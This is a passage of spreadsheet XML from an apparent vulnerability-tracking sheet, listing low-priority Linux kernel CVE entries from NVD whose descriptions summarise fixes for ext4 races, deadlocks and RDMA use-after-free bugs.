          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B829" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92500</t>
        </is>
      </c>
      <c r="D829" s="5" t="inlineStr"/>
      <c r="E829" s="5" t="inlineStr"/>
      <c r="F829" s="5" t="inlineStr"/>
      <c r="G829" s="5" t="inlineStr"/>
      <c r="H829" s="5" t="inlineStr"/>
      <c r="I829" s="5" t="inlineStr"/>
      <c r="J829" s="5" t="inlineStr"/>
      <c r="K829" s="5" t="inlineStr"/>
      <c r="L829" s="5" t="inlineStr"/>
      <c r="M829" s="5" t="inlineStr"/>
      <c r="N829" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O829" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P829" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q829" s="5" t="inlineStr"/>
      <c r="R829" s="5" t="inlineStr"/>
      <c r="S829" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: use fsdata to track inline data write state and fix race
Instead of checking the live inode state (ext4_has_inline_data(inode)
and ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA)) in the
write_end handlers, use the fsdata parameter of the address space
operations to explicitly pass down the state in which write_begin
prepared the write.
A concurrent thread (such as ext4_page_mkwrite()) can convert the
inline data to an extent between write_begin and write_end. If this
happens, the write_end handlers would previously miss the inline
write_end path and fall through to extent-based write_end logic.
However, since block buffers were never allocated in write_begin,
this resulted in NULL pointer dereferences or data loss because
folio_buffers(folio) was NULL.
Define EXT4_WRITE_DATA_INLINE (4) as a bit flag (Bit 2), treating
fsdata as bitwise flags rather than mutually exclusive enums to keep
states of the write path independent. Communicate this state via
fsdata:
1) ext4_write_begin() and ext4_da_write_begin() set the
   EXT4_WRITE_DATA_INLINE bit in *fsdata via bitwise OR when an inline
   write is successfully prepared.
2) On entry, ext4_write_begin() clears the EXT4_WRITE_DATA_INLINE bit
   to safely handle VFS retries (where generic_perform_write() bypasses
   the fsdata initialization on its retry jump).
3) The write_end handlers perform a bitwise AND to check if the
   EXT4_WRITE_DATA_INLINE bit is set and invoke the inline write_end
   helper accordingly.
Furthermore, during a buffered write, ext4_write_inline_data_end()
acquires the xattr lock after preparing the write. If a concurrent
page fault (ext4_page_mkwrite()) converts the inline data to an extent
after the write_end handlers check the state but before
ext4_write_inline_data_end() acquires the xattr write lock, the
subsequent check will trigger a kernel panic via
BUG_ON(!ext4_has_inline_data(inode)).
To keep git history working and bisectability clean, replace the
BUG_ON check in ext4_write_inline_data_end() with a graceful error-
handling retry path in this same commit. If the inline data is cleared
after locking the xattr, we safely release all resources (releasing
iloc.bh, unlocking/putting the folio, stopping the active journal
transaction handle) and return 0 (VFS retry) to let the generic write
path retry the operation safely.</t>
        </is>
      </c>
      <c r="T829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92500</t>
        </is>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B830" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92501</t>
        </is>
      </c>
      <c r="D830" s="5" t="inlineStr"/>
      <c r="E830" s="5" t="inlineStr"/>
      <c r="F830" s="5" t="inlineStr"/>
      <c r="G830" s="5" t="inlineStr"/>
      <c r="H830" s="5" t="inlineStr"/>
      <c r="I830" s="5" t="inlineStr"/>
      <c r="J830" s="5" t="inlineStr"/>
      <c r="K830" s="5" t="inlineStr"/>
      <c r="L830" s="5" t="inlineStr"/>
      <c r="M830" s="5" t="inlineStr"/>
      <c r="N830" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O830" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P830" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q830" s="5" t="inlineStr"/>
      <c r="R830" s="5" t="inlineStr"/>
      <c r="S830" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: drain in-flight DIO before buffered write fallback
generic/746 started failing intermittently on ext3 (no-extent inodes).
The test triggers 'Page cache invalidation failure on direct I/O'
warnings and subsequent fsync returns -EIO. Adding a 50ms delay
between ext4_buffered_write_iter() and filemap_write_and_wait_range()
in ext4_dio_write_iter() makes the race almost always reproducible.
On no-extent inodes, DIO writes to holes cannot use unwritten extents,
so ext4_iomap_alloc() leaves m_flags=0 and ext4_map_blocks() returns 0.
The iomap layer then returns -ENOTBLK, causing fallback to buffered I/O.
The fallback path in ext4_dio_write_iter() calls
ext4_buffered_write_iter() which dirties pages, then does flush and
invalidate. However, there's an unprotected window between
ext4_buffered_write_iter() returning (with inode lock released) and
the subsequent flush+invalidate.
Concurrent async DIO completions from other threads can run
kiocb_invalidate_post_direct_write() during this window. If pages have
been re-dirtied, post-invalidation finds dirty pages and triggers the
warning, setting -EIO in the error sequence.
Consider a file with two 4k extents: [hole][written]. Thread A does
DIO to the written extent, while thread B does DIO spanning both:
  kworker A (4k DIO, allocated block)    kworker B (8k DIO, fallback)
  -----------------------------------    ----------------------------
  inode_lock_shared()                    inode_lock_shared()
  iomap_dio_rw():                        iomap_dio_rw():
    kiocb_invalidate_pages -&gt; clean        iomap_begin -&gt; -ENOTBLK
    submit_bio (async)                     dio-&gt;size = 0
  inode_unlock_shared()                  inode_unlock_shared()
  [bio pending in block layer]           /* fallback: lock released */
                                         ext4_buffered_write_iter()
                                           inode_lock(exclusive)
                                           generic_perform_write()
                                             -&gt; dirty pages [0, 8k]
                                           inode_unlock(exclusive)
                                         /* pages dirty, no lock */
  [bio completes]                        filemap_write_and_wait_range()
  iomap_dio_complete()                     -&gt; flush dirty pages
    kiocb_invalidate_post_direct_write() invalidate_mapping_pages()
      invalidate_inode_pages2_range()
      -&gt; finds dirty page!
      -&gt; dio_warn_stale_pagecache()
      -&gt; errseq_set(-EIO)
This issue can be triggered through normal I/O paths, not just
intentionally overlapping DIO writes from userspace. For example,
generic/746 uses a loop device where multiple kworkers issue concurrent
I/O to the backing file. Additionally, when block_size &lt; folio_size,
non-overlapping DIO writes that share a large folio can also trigger
the race.
Add inode_dio_wait() in ext4_buffered_write_iter() before
ext4_write_checks() to drain all in-flight DIO. This ensures that
all DIO clears existing pages before submitting IO (via
kiocb_invalidate_pages()), all BIO waits for all DIO to complete
(via inode_dio_wait()), and ext4_write_checks() observes the inode
size after all completed DIO so that ext4_block_zero_eof() does not
race with in-flight DIO, thus eliminating the race.</t>
        </is>
      </c>
      <c r="T830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92501</t>
        </is>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B831" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92502</t>
        </is>
      </c>
      <c r="D831" s="5" t="inlineStr"/>
      <c r="E831" s="5" t="inlineStr"/>
      <c r="F831" s="5" t="inlineStr"/>
      <c r="G831" s="5" t="inlineStr"/>
      <c r="H831" s="5" t="inlineStr"/>
      <c r="I831" s="5" t="inlineStr"/>
      <c r="J831" s="5" t="inlineStr"/>
      <c r="K831" s="5" t="inlineStr"/>
      <c r="L831" s="5" t="inlineStr"/>
      <c r="M831" s="5" t="inlineStr"/>
      <c r="N831" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O831" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P831" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q831" s="5" t="inlineStr"/>
      <c r="R831" s="5" t="inlineStr"/>
      <c r="S831" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: clear stale xarray tags on folios skipped during writeback
In data=journal mode, the writeback thread can hit the
WARN_ON_ONCE(sb_rdonly(sb)) in ext4_journal_check_start() while the
superblock is being remounted read-only during reboot:
Workqueue: writeback wb_workfn (flush-253:0)
RIP: 0010:ext4_journal_check_start+0x8b/0xd0
Call Trace:
  __ext4_journal_start_sb+0x3c/0x1e0
  mpage_prepare_extent_to_map+0x4af/0x580
  ext4_do_writepages+0x3c0/0x1080
  ext4_writepages+0xc8/0x1a0
  do_writepages+0xc4/0x180
  __writeback_single_inode+0x45/0x2f0
  writeback_sb_inodes+0x26b/0x5d0
  __writeback_inodes_wb+0x54/0x100
  wb_writeback+0x1ac/0x320
  wb_workfn+0x394/0x470
And followed by the warning:
EXT4-fs warning (device vda1): ext4_evict_inode:195: inode #6263:
comm (sd-umount): data will be lost
This issue is not reproduced every time, but frequently.
The reproduction step is to create a VM with 8 CPUs, 16G memory and
setup data=journal:
sudo tune2fs -o journal_data /dev/vda1
Run fio:
rm -f fiotest
fio --name=fiotest --rw=randwrite --bs=4k --runtime=6 --ioengine=libaio
--iodepth=256 --numjobs=8 --filename=fiotest --filesize=30G
--group_reporting
Reboot the VM, and check the console output from:
virsh console testvm
But there is no dirty inode, folio_clear_dirty_for_io clears PG_dirty
but leaves tags PAGECACHE_TAG_DIRTY and PAGECACHE_TAG_TOWRITE set which
are only cleared by __folio_start_writeback.
In data=journal mode, jbd2 checkpoints the journalled data to its final
location and clears its own dirty flag without touching folio PG_dirty
or xarray dirty flags.
The commit f4a2b42e7891 ("ext4: fix stale xarray tags after writeback")
fixes when PG_dirty is still set but there is no dirty page.
Another case is PG_dirty is cleared, but PAGECACHE_TAG_DIRTY and
PAGECACHE_TAG_TOWRITE is still set. In this case, writeback thread
checks clean folio and skips it in mpage_prepare_extent_to_map:
if (!folio_test_dirty(folio) ||
    ...
        folio_unlcok(folio);
	continue
And never reaches ext4_bio_write_folio where the commit f4a2b42e7891
clears the stale xarray tags. Print debug logs after the filesystem
is remounted read-only:
writepages RDONLY nrpages=2048 dirtytag=1 wbtag=0 towrite=1 sync=0
And all folios are actually clean:
folio idx=3 dirty=0 wb=0 checked=0 dirtybuf=0 jbddirty=0 mapped=1
...
We need to clear the xarray stale tags for such clean folios by
cycling them through writeback in the skip path, the same way
f4a2b42e7891 does in ext4_bio_write_folio.</t>
        </is>
      </c>
      <c r="T831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92502</t>
        </is>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B832" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92503</t>
        </is>
      </c>
      <c r="D832" s="5" t="inlineStr"/>
      <c r="E832" s="5" t="inlineStr"/>
      <c r="F832" s="5" t="inlineStr"/>
      <c r="G832" s="5" t="inlineStr"/>
      <c r="H832" s="5" t="inlineStr"/>
      <c r="I832" s="5" t="inlineStr"/>
      <c r="J832" s="5" t="inlineStr"/>
      <c r="K832" s="5" t="inlineStr"/>
      <c r="L832" s="5" t="inlineStr"/>
      <c r="M832" s="5" t="inlineStr"/>
      <c r="N832" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O832" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P832" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q832" s="5" t="inlineStr"/>
      <c r="R832" s="5" t="inlineStr"/>
      <c r="S832" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: fix ABBA deadlock in ext4_xattr_inode_cache_find()
Syzbot/stress-ng reported an ABBA deadlock in ext4 when exercising
concurrent xattr workloads (using the ea_inode mount/format option).
The deadlock occurs between the running transaction and the eviction
thread:
- Task 1 (stress-ng): Holds a reference to a shared mbcache_entry (ce)
  and calls ext4_xattr_inode_cache_find() -&gt; ext4_iget() to retrieve
  the corresponding EA inode. Since the EA inode is currently being
  evicted, ext4_iget() blocks in __wait_on_freeing_inode() waiting for
  eviction to complete.
- Task 2 (eviction thread): Currently evicting the same EA inode in
  ext4_evict_ea_inode(). It calls mb_cache_entry_wait_unused(oe) which
  blocks waiting for Task 1 to release the reference to the mbcache_entry.
To break this deadlock, implement a new ext4_iget() configuration flag
named EXT4_IGET_NOWAIT. When set, perform a non-blocking lookup of the
inode via VFS's find_inode_nowait() API.
If the inode is currently being evicted (marked with I_FREEING or
I_WILL_FREE) or created (I_CREATING), or if it is not present in the VFS
inode cache (cache miss), simply skip it (returning -ENOENT) rather than
waiting for eviction/creation to complete, breaking the ABBA cycle.
Since we return -ENOENT immediately on a cache miss, we never attempt to
allocate a new inode or call iget_locked(), completely eliminating any
TOCTOU race window.
If the returned inode is I_NEW, wait for its initialization to clear via
wait_on_new_inode(). If initialization fails and the inode is unhashed
during wait_on_new_inode() waking up (e.g., due to an I/O read error in
another thread), safely drop the reference and return -ENOENT. This
unhashed check is executed unconditionally on all cache-hit pathways to
properly handle concurrent initialization failures.
Finally, standard validation checks (including is_bad_inode,
EXT4_EA_INODE_FL, file_acl, and xattr flags) are executed as normal inside
check_igot_inode() to fully guarantee VFS-layer safety.
In ext4_xattr_inode_cache_find(), invoke ext4_iget() with the new
EXT4_IGET_NOWAIT flag to perform the non-blocking cache search.</t>
        </is>
      </c>
      <c r="T832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92503</t>
        </is>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B833" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92504</t>
        </is>
      </c>
      <c r="D833" s="5" t="inlineStr"/>
      <c r="E833" s="5" t="inlineStr"/>
      <c r="F833" s="5" t="inlineStr"/>
      <c r="G833" s="5" t="inlineStr"/>
      <c r="H833" s="5" t="inlineStr"/>
      <c r="I833" s="5" t="inlineStr"/>
      <c r="J833" s="5" t="inlineStr"/>
      <c r="K833" s="5" t="inlineStr"/>
      <c r="L833" s="5" t="inlineStr"/>
      <c r="M833" s="5" t="inlineStr"/>
      <c r="N833" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O833" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P833" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q833" s="5" t="inlineStr"/>
      <c r="R833" s="5" t="inlineStr"/>
      <c r="S833" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
thermal: intel: int3400: clean up ODVP on probe failures
evaluate_odvp() creates per-ODVP sysfs files before the thermal zone
and later probe resources are registered. The current unwind path only
calls cleanup_odvp() from the late sysfs failure path, so failures after
evaluate_odvp() but before that label, including
thermal_tripless_zone_device_register() failures, leave the ODVP files
and storage behind.
Move the ODVP cleanup to the common ART/TRT unwind path so every failure
after evaluate_odvp() releases the ODVP state. Also clear the cached
ODVP pointers in cleanup_odvp(), because evaluate_odvp() can already call
it for partial setup failures while probe continues.</t>
        </is>
      </c>
      <c r="T833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92504</t>
        </is>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B834" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92505</t>
        </is>
      </c>
      <c r="D834" s="5" t="inlineStr"/>
      <c r="E834" s="5" t="inlineStr"/>
      <c r="F834" s="5" t="inlineStr"/>
      <c r="G834" s="5" t="inlineStr"/>
      <c r="H834" s="5" t="inlineStr"/>
      <c r="I834" s="5" t="inlineStr"/>
      <c r="J834" s="5" t="inlineStr"/>
      <c r="K834" s="5" t="inlineStr"/>
      <c r="L834" s="5" t="inlineStr"/>
      <c r="M834" s="5" t="inlineStr"/>
      <c r="N834" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O834" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P834" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q834" s="5" t="inlineStr"/>
      <c r="R834" s="5" t="inlineStr"/>
      <c r="S834" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/amd: Fix undefined behavior in devid_write debugfs function
When for_each_pci_segment() loop completes without finding a matching
segment, the pci_seg pointer is not NULL but points to an invalid memory
location (the list head). Accessing pci_seg-&gt;id after the loop causes
undefined behavior.
Fix this by handling the successful case inside the loop and returning
-EINVAL after the loop if no matching segment is found.</t>
        </is>
      </c>
      <c r="T834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92505</t>
        </is>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B835" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92506</t>
        </is>
      </c>
      <c r="D835" s="5" t="inlineStr"/>
      <c r="E835" s="5" t="inlineStr"/>
      <c r="F835" s="5" t="inlineStr"/>
      <c r="G835" s="5" t="inlineStr"/>
      <c r="H835" s="5" t="inlineStr"/>
      <c r="I835" s="5" t="inlineStr"/>
      <c r="J835" s="5" t="inlineStr"/>
      <c r="K835" s="5" t="inlineStr"/>
      <c r="L835" s="5" t="inlineStr"/>
      <c r="M835" s="5" t="inlineStr"/>
      <c r="N835" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O835" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P835" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q835" s="5" t="inlineStr"/>
      <c r="R835" s="5" t="inlineStr"/>
      <c r="S835" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Fix requested device removal race
scmi_protocol_device_unrequest() drops scmi_requested_devices_mtx while
notifying listeners but continues to retain the per-protocol list head.
When two SCMI drivers for the same protocol unregister concurrently, one
thread can remove the final request and free the list head while the other
is running its notifier. The latter then dereferences the freed list head
after reacquiring the mutex and can free it a second time.
Complete the list and IDR updates, including freeing an empty list head,
before dropping the mutex. Keep the blocking notifier outside the critical
section and retain only the detached request across the callback.</t>
        </is>
      </c>
      <c r="T835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92506</t>
        </is>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B836" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92507</t>
        </is>
      </c>
      <c r="D836" s="5" t="inlineStr"/>
      <c r="E836" s="5" t="inlineStr"/>
      <c r="F836" s="5" t="inlineStr"/>
      <c r="G836" s="5" t="inlineStr"/>
      <c r="H836" s="5" t="inlineStr"/>
      <c r="I836" s="5" t="inlineStr"/>
      <c r="J836" s="5" t="inlineStr"/>
      <c r="K836" s="5" t="inlineStr"/>
      <c r="L836" s="5" t="inlineStr"/>
      <c r="M836" s="5" t="inlineStr"/>
      <c r="N836" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O836" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P836" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q836" s="5" t="inlineStr"/>
      <c r="R836" s="5" t="inlineStr"/>
      <c r="S836" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Fix potential use after free in ib_dealloc_pd_user()
When accessing a PD via the netlink path the only synchronization
mechanism for the said PD is rdma_restrack_get().
Currently, rdma_restrack_del() is invoked at the end of
ib_dealloc_pd_user(), which is too late, since by that point
vendor-specific resources associated with the PD might already be
freed. This can leave a short window where the PD remains accessible
through restrack, leading to a potential use-after-free.
Fix this by moving the rdma_restrack_begin_del() call to the start of
ib_dealloc_pd_user(), ensuring that the PD is removed from restrack
before its internal resources are released. This guarantees that no new
users hold references to a PD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836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92507</t>
        </is>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B837" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92508</t>
        </is>
      </c>
      <c r="D837" s="5" t="inlineStr"/>
      <c r="E837" s="5" t="inlineStr"/>
      <c r="F837" s="5" t="inlineStr"/>
      <c r="G837" s="5" t="inlineStr"/>
      <c r="H837" s="5" t="inlineStr"/>
      <c r="I837" s="5" t="inlineStr"/>
      <c r="J837" s="5" t="inlineStr"/>
      <c r="K837" s="5" t="inlineStr"/>
      <c r="L837" s="5" t="inlineStr"/>
      <c r="M837" s="5" t="inlineStr"/>
      <c r="N837" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O837" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P837" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q837" s="5" t="inlineStr"/>
      <c r="R837" s="5" t="inlineStr"/>
      <c r="S837" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Fix potential use after free in ib_free_cq()
When accessing a CQ via the netlink path the only synchronization
mechanism for the said CQ is rdma_restrack_get().
Currently, rdma_restrack_del() is invoked at the end of
ib_free_cq(), which is too late, since by that point
vendor-specific resources associated with the CQ might already be
freed. This can leave a short window where the CQ remains accessible
through restrack, leading to a potential use-after-free.
Fix this by moving the rdma_restrack_del() call to be before the freeing
of the vendor-specific resources ensuring that the CQ is removed from
restrack before its internal resources are released.
This guarantees that no new users hold references to a CQ that is in
the process of destruction.</t>
        </is>
      </c>
      <c r="T837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92508</t>
        </is>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B838" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92509</t>
        </is>
      </c>
      <c r="D838" s="5" t="inlineStr"/>
      <c r="E838" s="5" t="inlineStr"/>
      <c r="F838" s="5" t="inlineStr"/>
      <c r="G838" s="5" t="inlineStr"/>
      <c r="H838" s="5" t="inlineStr"/>
      <c r="I838" s="5" t="inlineStr"/>
      <c r="J838" s="5" t="inlineStr"/>
      <c r="K838" s="5" t="inlineStr"/>
      <c r="L838" s="5" t="inlineStr"/>
      <c r="M838" s="5" t="inlineStr"/>
      <c r="N838" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O838" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P838" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q838" s="5" t="inlineStr"/>
      <c r="R838" s="5" t="inlineStr"/>
      <c r="S838" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Fix potential use after free in counter_release()
When accessing a counter via the netlink path the only synchronization
mechanism for the said counter is rdma_restrack_get().
Currently, rdma_restrack_del() is invoked at the end of
counter_release(), which is too late, since by that point
vendor-specific resources associated with the counter might already be
freed. This can leave a short window where the counter remains
accessible through restrack, leading to a potential use-after-free.
Fix this by moving the rdma_restrack_del() call to be before the
freeing of the vendor-specific resources, ensuring that the counter is
removed from restrack before its internal resources are released.
This guarantees that no new users hold references to a counter that is
in the process of destruction.</t>
        </is>
      </c>
      <c r="T838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92509</t>
        </is>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B839" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92510</t>
        </is>
      </c>
      <c r="D839" s="5" t="inlineStr"/>
      <c r="E839" s="5" t="inlineStr"/>
      <c r="F839" s="5" t="inlineStr"/>
      <c r="G839" s="5" t="inlineStr"/>
      <c r="H839" s="5" t="inlineStr"/>
      <c r="I839" s="5" t="inlineStr"/>
      <c r="J839" s="5" t="inlineStr"/>
      <c r="K839" s="5" t="inlineStr"/>
      <c r="L839" s="5" t="inlineStr"/>
      <c r="M839" s="5" t="inlineStr"/>
      <c r="N839" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O839" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P839" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q839" s="5" t="inlineStr"/>
      <c r="R839" s="5" t="inlineStr"/>
      <c r="S839" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Fix potential use after free in ib_destroy_srq_user()
When accessing a SRQ via the netlink path the only synchronization
mechanism for the said SRQ is rdma_restrack_get().
Currently, rdma_restrack_del() is invoked at the end of
ib_destroy_srq_user(), which is too late, since by that point
vendor-specific resources associated with the SRQ might already be
freed. This can leave a short window where the SRQ remains accessible
through restrack, leading to a potential use-after-free.
Fix this by moving the rdma_restrack_begin_del() call to the start of
ib_destroy_srq_user(), ensuring that the SRQ is removed from restrack
before its internal resources are released. This guarantees that no new
users hold references to a SRQ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839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92510</t>
        </is>
      </c>
    </row>
    <row r="840">
      <c r="A840" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B840" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92511</t>
        </is>
      </c>
      <c r="D840" s="5" t="inlineStr"/>
      <c r="E840" s="5" t="inlineStr"/>
      <c r="F840" s="5" t="inlineStr"/>
      <c r="G840" s="5" t="inlineStr"/>
      <c r="H840" s="5" t="inlineStr"/>
      <c r="I840" s="5" t="inlineStr"/>
      <c r="J840" s="5" t="inlineStr"/>
      <c r="K840" s="5" t="inlineStr"/>
      <c r="L840" s="5" t="inlineStr"/>
      <c r="M840" s="5" t="inlineStr"/>
      <c r="N840" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O840" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P840" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q840" s="5" t="inlineStr"/>
      <c r="R840" s="5" t="inlineStr"/>
      <c r="S840" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Fix potential use after free in ib_destroy_cq_user()
When accessing a CQ via the netlink path the only synchronization
mechanism for the said CQ is rdma_restrack_get().
Currently, rdma_restrack_del() is invoked at the end of
ib_destroy_cq_user(), which is too late, since by that point
vendor-specific resources associated with the CQ might already be
freed. This can leave a short window where the CQ remains accessible
through restrack, leading to a potential use-after-free.
Fix this by moving the rdma_restrack_begin_del() call to the start of
ib_destroy_cq_user(), ensuring that the CQ is removed from restrack
before its internal resources are released. This guarantees that no new
users hold references to a CQ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840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92511</t>
        </is>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B841" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92512</t>
        </is>
      </c>
      <c r="D841" s="5" t="inlineStr"/>
      <c r="E841" s="5" t="inlineStr"/>
